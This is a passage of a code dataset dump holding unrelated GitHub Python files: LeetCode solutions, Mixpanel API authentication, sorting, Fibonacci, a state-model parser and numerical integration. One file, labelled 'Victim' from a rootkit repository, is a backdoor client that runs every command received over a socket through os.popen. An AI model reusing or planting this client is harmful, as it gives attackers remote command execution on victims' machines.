2]) / 2 * framerate / scale\n f.write(str(v_1x) + '\\t' + str(v_1y) + '\\t' + str(v_2x) + '\\t' + str(v_2y) + '\\t')\n f.write(str(abs((v_1x*v_1x+v_1y*v_1y)-(v_2x*v_2x+v_2y*v_2y)) / 2 * mass) + '\\t')\n f.write(str(np.degrees(np.arctan(v_1y/v_1x))) + '\\t' + 
str(np.degrees(np.arctan(v_2y/v_2x))) + '\\t')\n impact_x.append(temp[number[len(number) - j] - 1][2] / 2 + temp[number[len(number) - j]][2] / 2)\n impact_y.append(filtered[number[len(number) - j - 1]-begin] / 2 + filtered[number[len(number) - j]-begin] / 2)\n impact_number.append(number[len(number) - j])\n if len(impact_number)>1:\n f.write(str(abs(impact_x[-1]-impact_x[-2]))+'\\t')\n low = 10000\n for k in range(impact_number[-1],impact_number[-2]):\n if filtered[k - begin] int:\n childrenDict = collections.defaultdict(list)\n for i in range(1, len(parents)):\n childrenDict[parents[i]].append(i)\n scoreDict = dict()\n\n def computerNumber(node: int):\n counter = 1\n for child in childrenDict[node]:\n counter += computerNumber(child)\n scoreDict[node] = counter\n return counter\n\n computerNumber(0)\n length = len(parents)\n result = 0\n maxLength = float('-INF')\n for i in range(length):\n tempCounter = 1\n if parents[i] == -1:\n for child in childrenDict[i]:\n tempCounter *= scoreDict[child]\n elif not childrenDict[i]:\n tempCounter = length - 1\n else:\n temp = 0\n for child in childrenDict[i]:\n tempCounter *= scoreDict[child]\n temp += scoreDict[child]\n tempCounter *= length - 1 - temp\n if tempCounter > maxLength:\n maxLength = tempCounter\n result = 1\n elif tempCounter == maxLength:\n result += 1\n return result\n\n\ncountHighestScoreNodes([-1,2,0,2,0])\ncountHighestScoreNodes([-1,2,0])\ncountHighestScoreNodes([-1,3,3,5,7,6,0,0])\ncountHighestScoreNodes([-1,0,0,1,1])\n","repo_name":"Zombiesama18/Leetcode_Python","sub_path":"Leetcode/5908. 统计最高分的节点数目.py","file_name":"5908. 统计最高分的节点数目.py","file_ext":"py","file_size_in_byte":1983,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"70810946978","text":"\"\"\"\nThe classes in this module contain the logic to authenticate an http request to\nthe Mixpanel API\n\"\"\"\nimport base64\nimport hashlib\nimport json\nimport time\n\nimport six\nfrom mixpanel_query.utils import _tobytes, _totext, _unicode_urlencode\n\nfrom six.moves.urllib import request as url_request\n\n\nclass SignatureAuth(object):\n \"\"\"\n Signature-based authentication uses your api secret to create and md5 hash\n of your request's parameters for verification by mixpanel\n\n This method is deprecated, but mixpanel currently has no plans to remove\n support for this method of authentication.\n\n Please see https://mixpanel.com/help/reference/data-export-api#authentication\n for more details.\n \"\"\"\n DEFAULT_EXPIRATION = 600 # expire requests after 10 minutes\n\n def __init__(self, client):\n self.client = client\n\n def _hash_args(self, args, secret=None):\n \"\"\"\n Hashes arguments by joining key=value pairs, appending the api_secret, and\n then taking the MD5 hex digest.\n \"\"\"\n for arg in args:\n if isinstance(args[arg], list):\n args[arg] = json.dumps(args[arg])\n\n arg_strings = [\"{}={}\".format(arg, args[arg]) for arg in sorted(args.keys())]\n args_joined_string = ''.join(arg_strings)\n args_joined = _tobytes(args_joined_string)\n\n hash = hashlib.md5(args_joined)\n\n if secret:\n hash.update(_tobytes(secret))\n elif self.client.api_secret:\n hash.update(_tobytes(self.client.api_secret))\n return hash.hexdigest()\n\n def authenticate(self, url, params):\n \"\"\"\n returns a request object ready to be issued to the Mixpanel API\n \"\"\"\n params['api_key'] = self.client.api_key\n params['expire'] = int(time.time()) + self.DEFAULT_EXPIRATION\n\n # Creating signature\n if 'sig' in params:\n del 
params['sig']\n params['sig'] = self._hash_args(params, self.client.api_secret)\n\n request_url = '{base_url}?{encoded_params}'.format(\n base_url=url,\n encoded_params=_unicode_urlencode(params)\n )\n return url_request.Request(request_url)\n\n\nclass SecretAuth(object):\n \"\"\"\n Secret-based authentication sends your api secret over https for verification\n by mixpanel.\n\n This method of authentication is the recommended authentication method.\n\n Please see https://mixpanel.com/help/reference/data-export-api#authentication\n for more details.\n \"\"\"\n\n def __init__(self, client):\n self.client = client\n\n def authenticate(self, url, params):\n \"\"\"\n returns a request object ready to be issued to the Mixpanel API\n \"\"\"\n request_url = '{base_url}?{encoded_params}'.format(\n base_url=url,\n encoded_params=_unicode_urlencode(params)\n )\n request_headers = {\n 'Authorization': 'Basic ' + _totext(base64.standard_b64encode(_tobytes(\"{}:\".format(self.client.api_secret))))\n }\n return url_request.Request(request_url, headers=request_headers)\n","repo_name":"cooncesean/mixpanel-query-py","sub_path":"mixpanel_query/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":3093,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"34"} +{"seq_id":"6290199822","text":"from typing import List\n\n\nclass CoinChange2:\n def change(self, amount: int, coins: List[int]) -> int:\n dp = [0] * (amount + 1)\n dp[0] = 1\n for c in coins:\n for a in range(amount + 1):\n if c <= a:\n dp[a] = dp[a - c] + dp[a]\n return dp[-1]\n\n\nif __name__ == '__main__':\n init = CoinChange2()\n print(init.change(5, [1, 2, 5]))\n","repo_name":"arunma/DataStructuresAlgorithmsPython","sub_path":"lastmile/leetcode/june/CoinChange2.py","file_name":"CoinChange2.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"28290642020","text":"import sys\n\ndef merge_sort(array):\n if len(array)<=1: #배열이 아닌 경우\n return array\n mid = len(array) // 2 #반 자르고\n left = merge_sort(array[:mid]) #왼쪽 배열\n right = merge_sort(array[mid:]) #오른쪽 배열\n\n i,j,k = 0,0,0\n\n while i < len(left) and j StateModel:\n \"\"\"\n Parse the model file and return the content\n :return: The abstract syntax tree content of interest\n \"\"\"\n # Create an arpeggio parser for our model grammar that does not eliminate whitespace\n # We interpret newlines and indents in our grammar, so whitespace must be preserved\n parser = ParserPEG(self.model_grammar, StateModelParser.root_rule_name, skipws=False, debug=self.debug)\n # Now create an abstract syntax tree from our model text\n try:\n parse_tree = parser.parse(self.model_text)\n except NoMatch as e:\n raise ModelParseError(self.model_file_path.name, e) from None\n # Transform that into a result that is better organized with grammar artifacts filtered out\n result = visit_parse_tree(parse_tree, StateModelVisitor(debug=self.debug))\n # Make it even nicer using easy to reference named tuples\n if self.debug:\n # Transform dot files into pdfs\n peg_tree_dot = Path(\"peggrammar_parse_tree.dot\")\n peg_model_dot = Path(\"peggrammar_parser_model.dot\")\n parse_tree_dot = Path(\"statemodel_parse_tree.dot\")\n parser_model_dot = Path(\"statemodel_peg_parser_model.dot\")\n\n parse_tree_file = str(StateModelParser.xuml_model_dir / self.model_file_path.stem) + \"_parse_tree.pdf\"\n model_file = str(StateModelParser.xuml_model_dir / self.model_file_path.stem) + 
\"_model.pdf\"\n os.system(f'dot -Tpdf {parse_tree_dot} -o {parse_tree_file}')\n os.system(f'dot -Tpdf {parser_model_dot} -o {model_file}')\n # Cleanup unneeded dot files, we just use the PDFs for now\n parse_tree_dot.unlink(missing_ok=True)\n parser_model_dot.unlink(missing_ok=True)\n peg_tree_dot.unlink(missing_ok=True)\n peg_model_dot.unlink(missing_ok=True)\n # Return the refined model data, checking sequence length\n metadata = result.results.get('metadata') # Optional section\n domain = result.results.get('domain_header')\n lifecycle = result.results.get('lifecycle')\n assigner = result.results.get('assigner')\n events = result.results.get('events')\n states = result.results.get('state_block')\n # You can draw classes without rels, but not the other way around!\n return StateModel(\n domain=domain, lifecycle=lifecycle, assigner=assigner,\n events={} if not events else events[0],\n states=states,\n metadata=None if not metadata else metadata[0]\n )\n\nif __name__ == \"__main__\":\n markup_path = Path(__file__).parent.parent / 'Test/door.xsm'\n x = StateModelParser(model_file_path=markup_path, debug=True)\n x.parse()","repo_name":"modelint/flatland-model-diagram-editor","sub_path":"flatland/input/statemodel_parser.py","file_name":"statemodel_parser.py","file_ext":"py","file_size_in_byte":5108,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"34"} +{"seq_id":"48782841401","text":"from __future__ import division\nimport numpy as np\nimport itertools\n\ndef integration(func, a, b, nodes, weights, round_off=15):\n nodes = 0.5*(b - a)*np.array(nodes) + 0.5*(b + a)\n weights = np.array(weights)\n return np.around(0.5*(b-a)*np.sum(weights*func(nodes)), round_off)\n\ndef integration_2d(func, a_x, b_x, a_y, b_y, nodes_x, nodes_y, weights_x, weights_y, round_off=15):\n nodes_x = 0.5*(b_x-a_x)*np.array(nodes_x).reshape(len(nodes_x), 1) + 0.5*(b_x + a_x)\n nodes_y = 0.5*(b_y-a_y)*np.array(nodes_y).reshape(len(nodes_y), 1) + 0.5*(b_y + a_y)\n weights_x = np.array(weights_x).reshape(len(weights_x), 1)\n weights_y = np.array(weights_y).reshape(len(weights_y), 1)\n\n cross_pdt = list(itertools.product(nodes_x, nodes_y))\n x_coordinates = np.array([item[0] for item in cross_pdt]).reshape(nodes_x.shape[0]*nodes_y.shape[0])\n y_coordinates = np.array([item[1] for item in cross_pdt]).reshape(nodes_x.shape[0]*nodes_y.shape[0])\n\n func_evals = func(x_coordinates, y_coordinates).reshape(nodes_x.shape[0], nodes_y.shape[0])\n\n return np.around(float(0.25*(b_y - a_y)*(b_x - a_x)*np.dot(weights_x.T, np.dot(func_evals, weights_y))[0, 0]), round_off)\n\nif __name__ == '__main__':\n print('Running main!!!')\n def func(x, y):\n return 1/(1 + 50*x**2 + 20*y**2)\n\n def func2(x):\n return 1/(1 + 50*x**2)\n\n from nodes_and_weights import *\n nodes_x = get_lobatto_points(64)\n nodes_y = get_lobatto_points(64)\n weights_x = get_lobatto_weights(64)\n weights_y = get_lobatto_weights(64)\n\n x = get_legendre_points(64)\n y = get_legendre_points(64)\n\n from interpolation2d import *\n func_vals = [func(xi, yi) for xi in x for yi in y]\n lang_interpolation_2d = lagrange_2d(x, y, func_vals)\n\n from interpolation import *\n func_vals = np.array(func2(x))\n lang_interpolation = lagrange_1d(x, func_vals)\n\n print(integration_2d(func, 0, 1, 0, 1, nodes_x, nodes_y, weights_x, weights_y))\n print(integration_2d(lang_interpolation_2d.evaluate, 0, 1, 0, 1, nodes_x, nodes_y, weights_x, weights_y))\n\n print(integration(func2, 0, 1, nodes_x, weights_x))\n 
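# Hedged sanity check (an assumption about accuracy, using only names already in the script): the 64-node Lagrange interpolant of func2 should integrate to nearly the same value as the direct rule above, so something like\n    #   assert abs(integration(func2, 0, 1, nodes_x, weights_x) - integration(lang_interpolation.evaluate, 0, 1, nodes_x, weights_x)) < 1e-6\n    # is a reasonable expectation for the two prints that follow.\n    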
print(integration(lang_interpolation.evaluate, 0, 1, nodes_x, weights_x))\n","repo_name":"msuriyak/ME-757","sub_path":"integration.py","file_name":"integration.py","file_ext":"py","file_size_in_byte":2203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}\n+{"seq_id":"35679961605","text":"limite = int(input(\"Enter the maximum value of the series \"))\r\nanterior = 0\r\ninicial = 1\r\nfibonacci = str(0)\r\nsuma = 0\r\nwhile inicial <= limite:\r\n    \r\n    fibonacci = fibonacci + \",\" + str(inicial)  # append the current term so the series runs 0,1,1,2,3,...\r\n    \r\n    suma = anterior + inicial\r\n    anterior = inicial\r\n    inicial = suma\r\n    \r\n    print(fibonacci)","repo_name":"jdcuevasp/Fibonacci","sub_path":"fibonacci.py","file_name":"fibonacci.py","file_ext":"py","file_size_in_byte":299,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}\n+{"seq_id":"72694726499","text":"\"\"\"Utility functions that do not belong to any specific category.\"\"\"\n\nimport functools\nimport json\nimport logging\nimport warnings\nfrom typing import Union, List\n\nimport numpy as np\n\n\ndef remove_nan(json_string):\n    \"\"\"Replaces NaN with null values\n\n    Parameters\n    ----------\n    json_string: str\n        json string for which to apply the replacement\n\n    Returns\n    -------\n    str\n        json string with 'null' strings in place of 'NaN' ones.\n\n    \"\"\"\n    return json_string.replace('NaN', 'null')\n\n\ndef get_response_and_log(request, type='post'):\n    \"\"\"Parse a request and return its ajax payload as a data dictionary\n    \n    Parameters\n    ----------\n    request:\n        request object containing the requests received by the server\n    type:\n        request type: 'post', 'get'\n\n    Returns\n    -------\n    data dictionary of values\n\n    \"\"\"\n    res = request.values.get('ajax_data')\n\n    if res is not None:\n        logging.info(\"Ajax data received\")\n        logging.warning(\"Content: {}\".format(str(dict(request.args))))\n        return json.loads(res)\n    else:\n        logging.warning(\"Ajax data not received\")\n        logging.warning(\"Content (args): {}\".format(str(dict(request.args))))\n        logging.warning(\"Content (json): {}\".format(str(request.json)))\n        logging.warning(\"Content (data): {}\".format(str(request.data)))\n        logging.warning(\"Content (form): {}\".format(str(dict(request.form))))\n        logging.warning(\"Content (values): {}\".format(str(dict(request.values))))\n        # logging.warning(\"Content: {}\".format(str(dict(request.args))))\n        return None\n\n\ndef deprecated(deprecated_function):\n    \"\"\"Decorator for deprecated functions.\n\n    It warns the user whenever the function is called.\n\n    \"\"\"\n    @functools.wraps(deprecated_function)  # wraps must decorate the wrapper to take effect\n    def wrapper(*args, **kwargs):\n        warnings.warn(\"Function {} is deprecated, and will be removed.\".format(deprecated_function), DeprecationWarning)\n        return deprecated_function(*args, **kwargs)\n\n    return wrapper\n\n\ndef assert_required_data(data, keys):\n    \"\"\"Asserts the required keys exist in the data dictionary.\n\n    Parameters\n    ----------\n    data: dict\n        request dictionary\n    keys: list of str\n        keys to be checked in the dictionary\n\n    Returns\n    -------\n    None\n\n    Raises\n    ------\n    AssertionError if any of the values doesn't exist.\n\n    \"\"\"\n    if data is None:\n        raise AssertionError(\"Values for data were required by the API but none were found.\"\n                             \" Required: {}\".format(keys))\n\n    for val in keys:\n        if val not in data:\n            raise AssertionError(\"A value data['{}'] was required by the API but not found.\"\n                                 \" Required: {}\".format(val, keys))\n\n\n# noinspection PyUnboundLocalVariable\ndef 
get_vertical_visual_boundaries(y, y_margin):\n # Find the allowed y visual\n # See `myplotlib.js` -> `get_best_box(...)`\n y_min, y_max = np.min(y), np.max(y)\n y_max_min_distance = np.abs(y_max - y_min)\n y_increment = y_max_min_distance * y_margin\n y_bottom = y_min - y_increment\n y_top = y_max + y_increment\n return y_bottom, y_top\n\n\n# noinspection PyUnboundLocalVariable\ndef recreate_antisymmetric_matrix_from_list(el_list, size):\n if \"np\" not in globals():\n import numpy as np\n m = np.ndarray((size, size))\n i, j = 0, 0\n for el in el_list:\n m[i, j] = el\n if i != j:\n m[j, i] = 1 - el\n j += 1\n if j >= size:\n i += 1\n j = i\n return m\n\n\ndef get_scaled_distance_from_true_f(\n y_true: Union[np.ndarray, list],\n y_1: Union[np.ndarray, list],\n y_2: Union[np.ndarray, list]) \\\n -> Union[float, np.ndarray]:\n \"\"\"\n let y = this.model.get(\"y\");\n let scaling_value = this.model.get(\"scaling_value\");\n let error = this.model.get(\"smallest_error\");\n let min_y = np.list_min(y);\n let max_y = np.list_max(y);\n let farthest_distance = Math.abs(max_y - min_y) * scaling_value;\n let scaled_error = error / farthest_distance * 100;\n let score = Math.round(100 - scaled_error);\n \"\"\"\n max_y, min_y = np.max(y_true), np.min(y_true)\n dist = np.array(y_2) - np.array(y_1)\n farthest_visual_distance = np.abs(max_y - min_y)\n scaled_dist = dist / farthest_visual_distance * 100\n return scaled_dist\n\n\ndef get_score_from_x_index(x_index: Union[int, List[int], np.ndarray], y_true: Union[np.ndarray, list]) \\\n -> Union[float, np.ndarray]:\n \"\"\"\n let y = this.model.get(\"y\");\n let scaling_value = this.model.get(\"scaling_value\");\n let error = this.model.get(\"smallest_error\");\n let min_y = np.list_min(y);\n let max_y = np.list_max(y);\n let farthest_distance = Math.abs(max_y - min_y) * scaling_value;\n let scaled_error = error / farthest_distance * 100;\n let score = Math.round(100 - scaled_error);\n \"\"\"\n y_true = np.array(y_true)\n scaled_error = get_scaled_distance_from_true_f(\n y_true=y_true,\n y_1=y_true[x_index],\n y_2=np.max(y_true)\n )\n return 100 - scaled_error\n","repo_name":"fcole90/interactive_bayesian_optimization","sub_path":"interactive_bayesian_optimisation/libs/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5100,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"34"} +{"seq_id":"12211976580","text":"def main():\n A = []\n B = []\n\n for k in range(3):\n value = int(input(\"Enter values for Alice: \"))\n value2 = int(input(\"Enter values for Bob: \"))\n A.append(value)\n B.append(value2)\n\n print(compare_triplets(A, B))\n\ndef compare_triplets(a, b):\n scoreA = scoreB = 0\n result = []\n\n for i in range(len(a)):\n if a[i] > b[i]:\n scoreA += 1\n elif a[i] < b[i]:\n scoreB += 1\n elif a[i] == b[i]:\n scoreA += 0\n scoreB += 0\n\n result.append(scoreA)\n result.append(scoreB)\n\n return result\n\nmain()","repo_name":"sparkybug/ALgorithms","sub_path":"compare_triplets.py","file_name":"compare_triplets.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"7993757992","text":"import random\nimport numpy as np\nimport torch\nDEVICE = 'cuda' if torch.cuda.is_available() else 'cpu'\n\n\nclass Converter:\n \"\"\"\n torch index\n -> numpy action\n numpy action\n -> torch index\n \"\"\"\n def __init__(self, envname):\n self.envname = envname\n\n def index2act(self, _input, batch):\n if 
self.envname == \"hope\":\n if batch == 1:\n first_action = (_input % 5 / 2) - 1\n sec_action = ((_input % 25 - _input % 5) / 10) - 1\n third_action = ((_input - _input % 25) / 50) - 1\n out = torch.tensor([first_action, sec_action, third_action], device=DEVICE)\n else:\n i = 0\n out = torch.zeros((10, 3), device=DEVICE)\n while i < batch:\n first_action = (_input[i] % 5 / 2) - 1\n sec_action = ((_input[i] % 25 - _input[i] % 5) / 10) - 1\n third_action = ((_input[i] - _input[i] % 25) / 50) - 1\n out[i] = torch.tensor([first_action, sec_action, third_action], device=DEVICE)\n i = i + 1\n return out.cpu().numpy()\n elif self.envname == \"cart\":\n return _input.cpu().numpy()\n elif self.envname == \"test\":\n action_ary = [[20, 0], [12, 12], [0, 20], [-12, 12], [-20, 0], [-12, -12], [0, -20], [12, -12]]\n action_dict = {0: (5, 0), 1: (3, 3), 2: (0, 5), 3: (-3, 3),\n 4: (-5, 0), 5: (-3, -3), 6: (0, -5), 7: (3, -3)}\n _input = _input.cpu().numpy().astype(np.int64)\n try:\n a = len(_input)\n _input = np.array(_input)\n except:\n _input = np.array([_input])\n values = [action_dict[k] for k in _input if k in action_dict]\n result = [list(item) for item in values]\n return np.squeeze(result)\n\n else:\n print(\"converter error\")\n\n def act2index(self, _input, batch):\n if self.envname == \"hope\":\n if batch == 1:\n _input = _input + 1\n _input = _input * 2\n out = _input[2] * 25 + _input[1] * 5 + _input[0]\n else:\n i = 0\n out = np.zeros(batch)\n while i < batch:\n _input[i] = _input[i] + 1\n _input[i] = _input[i] * 2\n out[i] = _input[i][2] * 25 + _input[i][1] * 5 + _input[i][0]\n i = i + 1\n return torch.from_numpy(out).to(DEVICE)\n elif self.envname == \"cart\":\n return torch.from_numpy(_input).to(DEVICE)\n\n elif self.envname == \"test\":\n\n act_keys = [tuple(sublist) for sublist in _input]\n\n action_dict = {(5, 0): 0, (3, 3): 1, (0, 5): 2, (-3, 3): 3,\n (-5, 0): 4, (-3, -3): 5, (0, -5): 6, (3, -3): 7}\n values = [action_dict[k] for k in act_keys if k in action_dict]\n values = np.array(values)\n return torch.from_numpy(values).to(DEVICE)\n\n else:\n print(\"converter error\")\n\n def rand_act(self):\n if self.envname == \"hope\":\n return (np.random.randint(5, size=(3,)) - 2)/2\n elif self.envname == \"cart\":\n _a = np.random.randint(2, size=(1,))\n return _a[0]\n else:\n print(\"converter error\")\n\n\n\n\n","repo_name":"kkugosu/ppo_demo","sub_path":"utils/converter.py","file_name":"converter.py","file_ext":"py","file_size_in_byte":3415,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"15938393325","text":"from urllib.parse import urlparse\n\n\ndef use_md5(url: str) -> bool:\n \"\"\"This takes an upload URL in S3 and returns whether we should attach a checksum.\n\n It's only a workaround for missing functionality in moto.\n https://github.com/spulec/moto/issues/816\n \"\"\"\n host = urlparse(url).netloc.split(\":\")[0]\n if host.endswith(\".amazonaws.com\"):\n return True\n elif host in [\"127.0.0.1\", \"localhost\", \"172.19.0.1\"]:\n return False\n else:\n raise Exception(f\"Unknown S3 host: {host}\")\n","repo_name":"MohitJuneja/personalGPT","sub_path":"persbotenv/Lib/site-packages/modal_utils/blob_utils.py","file_name":"blob_utils.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"28510040987","text":"\n#iteration\ndef fibb(n):\n result = [1, 1]\n for i in range(n-2):\n result.append(result[i] + result[i+1])\n return 
result\n\n\nif __name__ == '__main__':\n    print(fibb(10))\n\n# recursively\n\ndef rec_fibb(n):\n    if n<2:\n        return 1\n    else:\n        return rec_fibb(n-2)+rec_fibb(n-1)\n\ndef fibb_list(n):\n    return [rec_fibb(i) for i in range(n)]\n\nif __name__ == '__main__':\n    print(fibb_list(6))","repo_name":"proteus21/DATA-SCIENCE-STUDY","sub_path":"Python Exam/6 - Classes/Fibonacci function.py","file_name":"Fibonacci function.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}\n+{"seq_id":"16286056990","text":"#Victim\r\n\r\nimport socket\r\nimport os\r\n\r\nserver = socket.socket()\r\nhost = '127.0.0.1' \r\nport = 1234\r\n\r\n# connect once before the loop: reconnecting an already-connected socket raises OSError\r\nserver.connect((host,port))\r\n\r\nrun = True\r\nwhile run:\r\n\r\n    msg = server.recv(1024)\r\n    os.popen(msg.decode('UTF-8'))\r\n\r\n    server.send('Target is Online . . . ' .encode('UTF-8'))\r\n","repo_name":"cleverguns/Simple-Rootkit-Script","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"}\n+{"seq_id":"38416348046","text":"from pages.handler import *\nfrom models.teams import *\nimport datetime\n\nclass APIHandler(Handler):\n\n    def build_team_object(self,team):\n        t = dict()\n        t['id'] = team.key().id()\n        t['key'] = str(team.key())\n        t['name'] = team.name\n        t['conference'] = team.conference\n        return t\n\n    def build_game_object(self,game):\n        g = dict()\n        g['id'] = game.key().id()\n        g['key'] = str(game.key())\n        g['number'] = game.number\n        g['team1'] = game.team1\n        g['team2'] = game.team2\n        g['team1_score'] = game.team1_score\n        g['team2_score'] = game.team2_score\n        g['favored'] = game.favored\n        g['spread'] = game.spread\n        g['state'] = game.state\n        g['quarter'] = game.quarter\n        g['time_left'] = game.time_left\n        g['date'] = self.format_date(game.date)\n        return g\n\n    def build_player_object(self,player):\n        p = dict()\n        p['id'] = player.key().id()\n        p['key'] = str(player.key())\n        p['name'] = player.name\n        p['years'] = player.years\n        return p\n\n    def build_week_object(self,week):\n        w = dict()\n        w['id'] = week.key().id()\n        w['key'] = str(week.key())\n        w['year'] = week.year\n        w['number'] = week.number\n        w['winner'] = week.winner\n        w['lock_picks'] = self.format_date(week.lock_picks)\n        w['lock_scores'] = self.format_date(week.lock_scores)\n\n        if week.games is None:\n            w['games'] = None\n        else:\n            w['games'] = [ str(game_key) for game_key in week.games]\n\n        return w\n\n    def build_pick_object(self,pick):\n        p = dict()\n        p['id'] = pick.key().id()\n        p['key'] = str(pick.key())\n        p['week'] = pick.week\n        p['player'] = pick.player\n        p['game'] = pick.game\n        p['winner'] = pick.winner\n        p['team1_score'] = pick.team1_score\n        p['team2_score'] = pick.team2_score\n        return p\n\n\n    def is_field_missing(self,field,data):\n        if field not in data:\n            self.error(400)\n            self.write('%s is missing' % (field))\n            return True\n        return False\n\n    def format_date(self,date):\n        if date is None:\n            return None\n        else:\n            if date.month < 10:\n                month = \"0%s\" % (date.month)\n            else:\n                month = \"%s\" % (date.month)\n\n            if date.day < 10:\n                day = \"0%s\" % (date.day)\n            else:\n                day = \"%s\" % (date.day)\n\n            year = \"%s\" % (date.year)\n\n            if date.hour < 10:\n                hour = \"0%s\" % (date.hour)\n            else:\n                hour = \"%s\" % (date.hour)\n\n            if date.minute < 10:\n                minute = \"0%s\" % (date.minute)\n            else:\n                minute = \"%s\" % (date.minute)\n\n            return \"%s/%s/%s %s:%s\" % (month,day,year,hour,minute)\n\n    def 
convert_to_datetime(self,date_str):\n return datetime.datetime.strptime(date_str,\"%m/%d/%Y %H:%M\")\n","repo_name":"jbholden/cdcpool_google","sub_path":"pages/api/api_handler.py","file_name":"api_handler.py","file_ext":"py","file_size_in_byte":3023,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"25572647154","text":"from django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Student',\n fields=[\n ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('login', models.CharField(max_length=15, unique=True, verbose_name='Логін учня')),\n ('clas', models.CharField(choices=[('1-A', '1-A'), ('1-B', '1-B'), ('2-A', '2-A'), ('2-B', '2-B'), ('3-A', '3-A'), ('3-B', '3-B'), ('4-A', '4-A'), ('4-B', '4-B'), ('5-A', '5-A'), ('5-B', '5-B'), ('6-A', '6-A'), ('6-B', '6-B'), ('7-A', '7-A'), ('7-B', '7-B'), ('8-A', '8-A'), ('8-B', '8-B'), ('9-A', '9-A'), ('9-B', '9-B'), ('10-A', '10-A'), ('10-B', '10-B'), ('11-A', '11-A'), ('11-B', '11-B')], max_length=4, verbose_name='Клас')),\n ('last_name', models.CharField(max_length=15, verbose_name=\"Ім'я учня\")),\n ('first_name', models.CharField(max_length=15, verbose_name='Прізвище учня')),\n ('image', models.ImageField(upload_to='D:\\\\Working\\\\Praktic\\\\Project\\\\Diary\\\\student\\\\static\\\\student\\\\img', verbose_name='Аватарка учня')),\n ],\n options={\n 'verbose_name': 'Учень',\n 'verbose_name_plural': 'Учні',\n },\n ),\n migrations.CreateModel(\n name='Teacher',\n fields=[\n ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('login', models.CharField(max_length=15, unique=True, verbose_name='Логін вчителя')),\n ('last_name', models.CharField(max_length=15, verbose_name=\"Ім'я вчителя\")),\n ('first_name', models.CharField(max_length=15, verbose_name='Прізвище вчителя')),\n ('predmet', models.CharField(choices=[('Алгебра', 'Алгебра'), ('Англійська мова', 'Англійська мова'), ('Астрономія', 'Астрономія'), ('Біологія', 'Біологія'), ('Біологія і екологія', 'Біологія і екологія'), ('Географія', 'Географія'), ('Геометрія', 'Геометрія'), ('Громадянська освіти', 'Громадянська освіти'), ('Зарубіжна література', 'Зарубіжна література'), ('Інформатика', 'Інформатика'), ('Історія', 'Історія'), ('Історія України', 'Історія України'), ('Математика', 'Математика'), ('Мистецтво', 'Мистецтво'), ('Музика', 'Музика'), ('Основи здоров’я', 'Основи здоров’я'), ('Правознавство', 'Правознавство'), ('Природа', 'Природа'), ('Технології', 'Технології'), ('Українська література', 'Українська література'), ('Українська мова', 'Українська мова'), ('Фізика', 'Фізика'), ('Фізична культура', 'Фізична культура'), ('Хімія', 'Хімія'), ('Я досліджую світ', 'Я досліджую світ')], max_length=255, verbose_name='Предмети')),\n ('image', models.ImageField(upload_to='D:\\\\Working\\\\Praktic\\\\Project\\\\Diary\\\\teacher\\\\static\\\\teacher\\\\img', verbose_name='Аватарка вчителя')),\n ],\n options={\n 'verbose_name': 'Вчитель',\n 'verbose_name_plural': 'Вчителі',\n },\n ),\n ]\n","repo_name":"Vervol03/Electronic_diary","sub_path":"Diary/main/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":3851,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"74722996256","text":"import pandas as pd\nimport numpy as 
np\nimport matplotlib.pyplot as plt\nfrom scipy.stats import multivariate_normal\nfrom scipy.stats import norm\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom matplotlib.backends.backend_agg import FigureCanvasAgg as FigureCanvas\n\ndef plot_3D_multi_norm_dist_1(Mu, Sigma, show=True):\n \"\"\"\n Plot Multivariate Normal Distribution.\n :param Mu: python list or numpy array, shape = (2,)\n :param Sigma: python list or numpy matrix, shape = (2, 2)\n :param show: if true, plot.show()\n :return: None\n \"\"\"\n # Create grid and multivariate normal\n x = np.linspace(-1, 1, 100)\n y = np.linspace(-1, 1, 100)\n X, Y = np.meshgrid(x, y)\n pos = np.empty(X.shape + (2,))\n pos[:, :, 0] = X\n pos[:, :, 1] = Y\n rv = multivariate_normal(Mu, Sigma)\n # Make a 3D plot\n fig = plt.figure()\n ax = fig.gca(projection='3d')\n ax.plot_surface(X, Y, rv.pdf(pos), cmap='viridis', linewidth=0)\n ax.set_xlabel('X axis')\n ax.set_ylabel('Y axis')\n ax.set_zlabel('Z axis')\n if show == True:\n plt.show()\n\ndef plot_3D_multi_norm_dist_n(Mu_x, Mu_y, Sigma_x, Sigma_y, show=True):\n start = -1\n stop = 1\n length = stop - start\n\n fig = plt.figure()\n ax = fig.gca(projection='3d')\n for x_i, mu_x in enumerate(Mu_x):\n x = np.linspace(start + (x_i*length), stop + (x_i*length), 100)\n sigma_x = Sigma_x[x_i, x_i]\n mu_x += (x_i)*length\n for y_i, mu_y in enumerate(Mu_y):\n 